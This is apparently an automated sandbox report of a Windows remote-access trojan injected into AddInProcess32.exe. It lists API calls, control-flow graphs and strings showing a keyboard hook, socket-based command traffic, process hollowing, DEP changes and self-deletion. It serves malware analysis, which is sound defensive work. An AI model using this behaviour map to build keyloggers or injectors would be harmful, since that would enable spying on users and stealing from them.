GetForegroundWindow GetWindowTextW 48770->48771 48772 40417e 28 API calls 48771->48772 48773 41bb70 48772->48773 48773->47989 48775 402093 28 API calls 48774->48775 48776 40f931 48775->48776 48776->47989 48778 4020df 11 API calls 48777->48778 48779 402f3d 48778->48779 48780 4032a0 28 API calls 48779->48780 48781 402f59 48780->48781 48781->47989 48783 404ab4 48782->48783 48878 40520c 48783->48878 48785 404ac9 ctype 48786 404b40 WaitForSingleObject 48785->48786 48787 404b20 48785->48787 48788 404b56 48786->48788 48789 404b32 send 48787->48789 48884 4210cb 54 API calls 48788->48884 48791 404b7b 48789->48791 48793 401fd8 11 API calls 48791->48793 48792 404b69 SetEvent 48792->48791 48794 404b83 48793->48794 48795 401fd8 11 API calls 48794->48795 48796 404b8b 48795->48796 48796->47989 48798 4020df 11 API calls 48797->48798 48799 404c27 48798->48799 48800 4020df 11 API calls 48799->48800 48803 404c30 48800->48803 48801 43bda0 new 21 API calls 48801->48803 48803->48801 48804 4020b7 28 API calls 48803->48804 48805 404ca1 48803->48805 48806 401fe2 28 API calls 48803->48806 48809 401fd8 11 API calls 48803->48809 48814 404c84 48803->48814 48902 404b96 48803->48902 48804->48803 48807 404e26 99 API calls 48805->48807 48806->48803 48808 404ca8 48807->48808 48810 401fd8 11 API calls 48808->48810 48809->48803 48811 404cb1 48810->48811 48812 401fd8 11 API calls 48811->48812 48813 404cba 48812->48813 48813->47989 48908 404cc3 32 API calls 48814->48908 48817 404e40 SetEvent CloseHandle 48816->48817 48818 404e57 closesocket 48816->48818 48819 404ed8 48817->48819 48820 404e64 48818->48820 48819->47989 48821 404e7a 48820->48821 48910 4050e4 84 API calls 48820->48910 48823 404e8c WaitForSingleObject 48821->48823 48824 404ece SetEvent CloseHandle 48821->48824 48911 41e7a2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 48823->48911 48824->48819 48826 404e9b SetEvent WaitForSingleObject 48912 41e7a2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 48826->48912 48828 404eb3 SetEvent CloseHandle CloseHandle 48828->48824 48829->47989 48830->47989 48832->47989 48833->48669 48834->48676 48839 40515c 102 API calls 48836->48839 48838 405159 48839->48838 48840->48705 48841->48695 48842->48725 48843->48739 48844->48737 48845->48708 48847->48754 48851 41458e 48848->48851 48852 4145a3 ___scrt_initialize_default_local_stdio_options 48851->48852 48855 43f7ed 48852->48855 48858 43c540 48855->48858 48859 43c580 48858->48859 48860 43c568 48858->48860 48859->48860 48862 43c588 48859->48862 48873 44062d 20 API calls __dosmaperr 48860->48873 48874 43a837 36 API calls 2 library calls 48862->48874 48864 43c598 48875 43ccc6 20 API calls 2 library calls 48864->48875 48865 43502b __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 48867 4145b1 48865->48867 48867->47989 48868 43c610 48876 43d334 51 API calls 3 library calls 48868->48876 48871 43c61b 48877 43cd30 20 API calls _free 48871->48877 48872 43c56d ___std_exception_copy 48872->48865 48873->48872 48874->48864 48875->48868 48876->48871 48877->48872 48879 405214 48878->48879 48880 4023ce 11 API calls 48879->48880 48881 40521f 48880->48881 48885 405234 48881->48885 48883 40522e 48883->48785 48884->48792 48886 405240 48885->48886 48887 40526e 48885->48887 48888 4028e8 28 API calls 48886->48888 48901 4028a4 22 API calls 48887->48901 48890 40524a 48888->48890 48890->48883 48903 404ba0 WaitForSingleObject 48902->48903 48904 404bcd recv 48902->48904 48909 421107 54 API calls 48903->48909 48905 404be0 48904->48905 48905->48803 48907 404bbc SetEvent 48907->48905 48908->48803 48909->48907 48910->48821 48911->48826 48912->48828 48914->48051 48915->48078 48916->48077 48917->48066 48918->48070 48919->48076 48920->48108 48925 40f7fd 48923->48925 48924 413584 3 API calls 48924->48925 48925->48924 48926 40f8a1 48925->48926 48928 40f891 Sleep 48925->48928 48945 40f82f 48925->48945 48929 409097 28 API calls 48926->48929 48927 409097 28 API calls 48927->48945 48928->48925 48932 40f8ac 48929->48932 48931 41bcef 28 API calls 48931->48945 48933 41bcef 28 API calls 48932->48933 48934 40f8b8 48933->48934 48958 41384f 14 API calls 48934->48958 48937 40f8cb 48939 401f09 11 API calls 48937->48939 48938 401f09 11 API calls 48938->48945 48941 40f8d7 48939->48941 48940 402093 28 API calls 48940->48945 48942 402093 28 API calls 48941->48942 48943 40f8e8 48942->48943 48946 4137aa 14 API calls 48943->48946 48944 4137aa 14 API calls 48944->48945 48945->48927 48945->48928 48945->48931 48945->48938 48945->48940 48945->48944 48956 40d0d1 112 API calls ___scrt_fastfail 48945->48956 48957 41384f 14 API calls 48945->48957 48947 40f8fb 48946->48947 48959 41288b TerminateProcess WaitForSingleObject 48947->48959 48949 40f903 ExitProcess 48960 412829 62 API calls 48953->48960 48957->48945 48958->48937 48959->48949 48961 40165e 48962 401666 48961->48962 48963 401669 48961->48963 48964 4016a8 48963->48964 48966 401696 48963->48966 48965 43455e new 22 API calls 48964->48965 48967 40169c 48965->48967 48968 43455e new 22 API calls 48966->48968 48968->48967

                                                  Control-flow Graph

                                                  APIs
                                                  • LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CBF6
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CBFF
                                                  • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CC19
                                                  • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC2B
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CC2E
                                                  • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC3F
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CC42
                                                  • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040EA1C), ref: 0041CC54
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CC57
                                                  • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040EA1C), ref: 0041CC63
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CC66
                                                  • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CC7A
                                                  • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CC8E
                                                  • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040EA1C), ref: 0041CC9F
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CCA2
                                                  • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CCB6
                                                  • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CCCA
                                                  • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CCDE
                                                  • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CCF2
                                                  • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD06
                                                  • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040EA1C), ref: 0041CD14
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD17
                                                  • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040EA1C), ref: 0041CD28
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD2B
                                                  • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040EA1C), ref: 0041CD38
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD3B
                                                  • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040EA1C), ref: 0041CD48
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD4B
                                                  • LoadLibraryA.KERNELBASE(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040EA1C), ref: 0041CD5D
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD60
                                                  • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040EA1C), ref: 0041CD6D
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD70
                                                  • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040EA1C), ref: 0041CD81
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD84
                                                  • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040EA1C), ref: 0041CD95
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD98
                                                  • LoadLibraryA.KERNELBASE(Rstrtmgr,RmStartSession,?,?,?,?,0040EA1C), ref: 0041CDAA
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CDAD
                                                  • LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,?,0040EA1C), ref: 0041CDBA
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CDBD
                                                  • LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,?,0040EA1C), ref: 0041CDCA
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CDCD
                                                  • LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,?,0040EA1C), ref: 0041CDDA
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CDDD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$LibraryLoad$HandleModule
                                                  • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                  • API String ID: 4236061018-3687161714
                                                  • Opcode ID: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
                                                  • Instruction ID: 87b5fa294a9840a4da0a94e675c49188b16ea4214af7843bc20054d8537ab592
                                                  • Opcode Fuzzy Hash: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
                                                  • Instruction Fuzzy Hash: 06419AA0E8035879DA107BB65D8DE3B3E5CD9857953614837B05C93550FBBCDC408EAE

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1277 40a2f3-40a30a 1278 40a30c-40a326 GetModuleHandleA SetWindowsHookExA 1277->1278 1279 40a36e-40a37e GetMessageA 1277->1279 1278->1279 1282 40a328-40a36c GetLastError call 41bc1f call 4052fd call 402093 call 41b580 call 401fd8 1278->1282 1280 40a380-40a398 TranslateMessage DispatchMessageA 1279->1280 1281 40a39a 1279->1281 1280->1279 1280->1281 1283 40a39c-40a3a1 1281->1283 1282->1283
                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A30E
                                                  • SetWindowsHookExA.USER32(0000000D,0040A2DF,00000000), ref: 0040A31C
                                                  • GetLastError.KERNEL32 ref: 0040A328
                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040A376
                                                  • TranslateMessage.USER32(?), ref: 0040A385
                                                  • DispatchMessageA.USER32(?), ref: 0040A390
                                                  Strings
                                                  • Keylogger initialization failure: error , xrefs: 0040A33C
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                  • String ID: Keylogger initialization failure: error
                                                  • API String ID: 3219506041-952744263
                                                  • Opcode ID: 25e136c2ffc33636d357cd73d29a3aedc6f18b6bf984cd9f7b53386870d4f0b3
                                                  • Instruction ID: 8743f2250fb8cae6a99ae5fb3d4b34fe2baf279f6720e4878f05ffc9670b3ffc
                                                  • Opcode Fuzzy Hash: 25e136c2ffc33636d357cd73d29a3aedc6f18b6bf984cd9f7b53386870d4f0b3
                                                  • Instruction Fuzzy Hash: 6011BF31510301EBC710BB769D0986B77ACEA95715B20097EFC82E22D1EB34C910CBAA

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 00413584: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 004135A4
                                                    • Part of subcall function 00413584: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,004752F0), ref: 004135C2
                                                    • Part of subcall function 00413584: RegCloseKey.KERNELBASE(?), ref: 004135CD
                                                  • Sleep.KERNELBASE(00000BB8), ref: 0040F896
                                                  • ExitProcess.KERNEL32 ref: 0040F905
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseExitOpenProcessQuerySleepValue
                                                  • String ID: 5.1.2 Pro$override$pth_unenc
                                                  • API String ID: 2281282204-3554326054
                                                  • Opcode ID: cd607c0515279b9d97aeea635d6f29185ab9b792f25f3438d110feeae55dec5d
                                                  • Instruction ID: d275b5d15c9ff05a0ec0da3c9587874d7690dc7fa5d0ec02d6e8a4ede61593ab
                                                  • Opcode Fuzzy Hash: cd607c0515279b9d97aeea635d6f29185ab9b792f25f3438d110feeae55dec5d
                                                  • Instruction Fuzzy Hash: 5921E171B0420127D6087676885B6AE399A9B80708F50453FF409672D7FF7C8E0483AF

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1426 404f51-404f5f 1427 404f65-404f6c 1426->1427 1428 404fea 1426->1428 1430 404f74-404f7b 1427->1430 1431 404f6e-404f72 1427->1431 1429 404fec-404ff1 1428->1429 1432 404fc0-404fe8 CreateEventA CreateThread 1430->1432 1433 404f7d-404fbb GetLocalTime call 41bc1f call 4052fd call 402093 call 41b580 call 401fd8 1430->1433 1431->1432 1432->1429 1433->1432
                                                  APIs
                                                  • GetLocalTime.KERNEL32(?), ref: 00404F81
                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404FCD
                                                  • CreateThread.KERNELBASE(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 00404FE0
                                                  Strings
                                                  • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Create$EventLocalThreadTime
                                                  • String ID: KeepAlive | Enabled | Timeout:
                                                  • API String ID: 2532271599-1507639952
                                                  • Opcode ID: 0f2139c50ef680eb2eec6eafdf8633bec5d9f7b08799dddc17b73162f3ba6cee
                                                  • Instruction ID: 41fa32a9fb91b1633a7afb8999ae97baef60c60c8d6252053b050d354fdafbcf
                                                  • Opcode Fuzzy Hash: 0f2139c50ef680eb2eec6eafdf8633bec5d9f7b08799dddc17b73162f3ba6cee
                                                  • Instruction Fuzzy Hash: 82110A71800385BAC720A7779C0DEAB7FACDBD2714F04046FF54162291D6B89445CBBA
                                                  APIs
                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,00474EF8,00404C49,00000000,?,?,?,00474EF8,?), ref: 00404BA5
                                                  • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
                                                  • recv.WS2_32(?,?,?,00000000), ref: 00404BDA
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: EventObjectSingleWaitrecv
                                                  • String ID:
                                                  • API String ID: 311754179-0
                                                  • Opcode ID: cdb06e8163b8322063f134be74ce7e1cf20e247c26aa7992d3e9e0113c183a83
                                                  • Instruction ID: 0899ded2458b7d4720508400fe02e5f5257555b40415190a6d7bc1514cf1b529
                                                  • Opcode Fuzzy Hash: cdb06e8163b8322063f134be74ce7e1cf20e247c26aa7992d3e9e0113c183a83
                                                  • Instruction Fuzzy Hash: 53F05E36108212FFC7019F10EC09E0AFB62FB85721F10862AF510512B08771FC20DB95
                                                  APIs
                                                  • GetComputerNameExW.KERNELBASE(00000001,?,0000002B,004750E4), ref: 0041B6BB
                                                  • GetUserNameW.ADVAPI32(?,0040F25E), ref: 0041B6D3
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Name$ComputerUser
                                                  • String ID:
                                                  • API String ID: 4229901323-0
                                                  • Opcode ID: 2a75debd1ac83804218ef8ff91a3dd31c7e5d47f43b5da7d436b4f8c80832694
                                                  • Instruction ID: 8360233331794fbd8bccde093e114755ab2a7c2896376219b9d5f45c8fb32f7b
                                                  • Opcode Fuzzy Hash: 2a75debd1ac83804218ef8ff91a3dd31c7e5d47f43b5da7d436b4f8c80832694
                                                  • Instruction Fuzzy Hash: 90014F7190011CABCB01EBD1DC45EEDB7BCAF44309F10016AB505B21A1EFB46E88CBA8
                                                  APIs
                                                  • GetLocaleInfoA.KERNELBASE(00000800,0000005A,00000000,00000003,?,?,?,00415537,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,5.1.2 Pro), ref: 0040F920
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InfoLocale
                                                  • String ID:
                                                  • API String ID: 2299586839-0
                                                  • Opcode ID: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                                                  • Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
                                                  • Opcode Fuzzy Hash: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                                                  • Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 5 40ea00-40ea82 call 41cbe1 GetModuleFileNameW call 40f3fe call 4020f6 * 2 call 41beac call 40fb52 call 401e8d call 43fd50 22 40ea84-40eac9 call 40fbee call 401e65 call 401fab call 410f72 call 40fb9f call 40f3eb 5->22 23 40eace-40eb96 call 401e65 call 401fab call 401e65 call 40531e call 406383 call 401fe2 call 401fd8 * 2 call 401e65 call 401fc0 call 405aa6 call 401e65 call 4051e3 call 401e65 call 4051e3 5->23 49 40ef2d-40ef3e call 401fd8 22->49 69 40eb98-40ebe3 call 406c59 call 401fe2 call 401fd8 call 401fab call 413584 23->69 70 40ebe9-40ec04 call 401e65 call 40b9f8 23->70 69->70 101 40f38a-40f3a5 call 401fab call 4139e4 call 4124b0 69->101 80 40ec06-40ec25 call 401fab call 413584 70->80 81 40ec3e-40ec45 call 40d0a4 70->81 80->81 97 40ec27-40ec3d call 401fab call 4139e4 80->97 89 40ec47-40ec49 81->89 90 40ec4e-40ec55 81->90 94 40ef2c 89->94 95 40ec57 90->95 96 40ec59-40ec65 call 41b354 90->96 94->49 95->96 103 40ec67-40ec69 96->103 104 40ec6e-40ec72 96->104 97->81 126 40f3aa-40f3db call 41bcef call 401f04 call 413a5e call 401f09 * 2 101->126 103->104 107 40ecb1-40ecc4 call 401e65 call 401fab 104->107 108 40ec74 call 407751 104->108 127 40ecc6 call 407790 107->127 128 40eccb-40ed53 call 401e65 call 41bcef call 401f13 call 401f09 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab 107->128 117 40ec79-40ec7b 108->117 120 40ec87-40ec9a call 401e65 call 401fab 117->120 121 40ec7d-40ec82 call 407773 call 40729b 117->121 120->107 140 40ec9c-40eca2 120->140 121->120 157 40f3e0-40f3ea call 40dd7d call 414f65 126->157 127->128 177 40ed55-40ed6e call 401e65 call 401fab call 43bb56 128->177 178 40edbb-40edbf 128->178 140->107 143 40eca4-40ecaa 140->143 143->107 147 40ecac call 40729b 143->147 147->107 177->178 205 40ed70-40edb6 call 401e65 call 401fab call 401e65 call 401fab call 40da6f call 401f13 call 401f09 177->205 180 40ef41-40efa1 call 436f10 call 40247c call 401fab * 2 call 413733 call 409092 178->180 181 40edc5-40edcc 178->181 236 40efa6-40effa call 401e65 call 401fab call 402093 call 401fab call 4137aa call 401e65 call 401fab call 43bb2c 180->236 184 40ee4a-40ee54 call 409092 181->184 185 40edce-40ee48 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 40ce34 181->185 191 40ee59-40ee7d call 40247c call 434829 184->191 185->191 212 40ee8c 191->212 213 40ee7f-40ee8a call 436f10 191->213 205->178 218 40ee8e-40eed9 call 401f04 call 43f859 call 40247c call 401fab call 40247c call 401fab call 413982 212->218 213->218 273 40eede-40ef03 call 434832 call 401e65 call 40b9f8 218->273 287 40f017-40f019 236->287 288 40effc 236->288 273->236 286 40ef09-40ef28 call 401e65 call 41bcef call 40f4af 273->286 286->236 306 40ef2a 286->306 289 40f01b-40f01d 287->289 290 40f01f 287->290 292 40effe-40f015 call 41ce2c CreateThread 288->292 289->292 293 40f025-40f101 call 402093 * 2 call 41b580 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 43bb2c call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab StrToIntA call 409e1f call 401e65 call 401fab 290->293 292->293 344 40f103-40f13a call 43455e call 401e65 call 401fab CreateThread 293->344 345 40f13c 293->345 306->94 347 40f13e-40f156 call 401e65 call 401fab 344->347 345->347 357 40f194-40f1a7 call 401e65 call 401fab 347->357 358 40f158-40f18f call 43455e call 401e65 call 401fab CreateThread 347->358 368 40f207-40f21a call 401e65 call 401fab 357->368 369 40f1a9-40f202 call 401e65 call 401fab call 401e65 call 401fab call 40da23 call 401f13 call 401f09 CreateThread 357->369 358->357 379 40f255-40f279 call 41b69e call 401f13 call 401f09 368->379 380 40f21c-40f250 call 401e65 call 401fab call 401e65 call 401fab call 43bb2c call 40c19d 368->380 369->368 402 40f27b-40f27c SetProcessDEPPolicy 379->402 403 40f27e-40f291 CreateThread 379->403 380->379 402->403 404 40f293-40f29d CreateThread 403->404 405 40f29f-40f2a6 403->405 404->405 408 40f2b4-40f2bb 405->408 409 40f2a8-40f2b2 CreateThread 405->409 412 40f2c9 408->412 413 40f2bd-40f2c0 408->413 409->408 418 40f2ce-40f302 call 402093 call 4052fd call 402093 call 41b580 call 401fd8 412->418 415 40f2c2-40f2c7 413->415 416 40f307-40f31a call 401fab call 41353a 413->416 415->418 425 40f31f-40f322 416->425 418->416 425->157 427 40f328-40f368 call 41bcef call 401f04 call 413656 call 401f09 call 401f04 425->427 443 40f381-40f386 DeleteFileW 427->443 444 40f388 443->444 445 40f36a-40f36d 443->445 444->126 445->126 446 40f36f-40f37c Sleep call 401f04 445->446 446->443
                                                  APIs
                                                    • Part of subcall function 0041CBE1: LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CBF6
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CBFF
                                                    • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC19
                                                    • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC2B
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC2E
                                                    • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC3F
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC42
                                                    • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040EA1C), ref: 0041CC54
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC57
                                                    • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040EA1C), ref: 0041CC63
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC66
                                                    • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC7A
                                                    • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC8E
                                                    • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040EA1C), ref: 0041CC9F
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCA2
                                                    • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCB6
                                                    • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCCA
                                                    • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCDE
                                                    • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCF2
                                                    • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CD06
                                                    • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040EA1C), ref: 0041CD14
                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe,00000104), ref: 0040EA29
                                                    • Part of subcall function 00410F72: __EH_prolog.LIBCMT ref: 00410F77
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
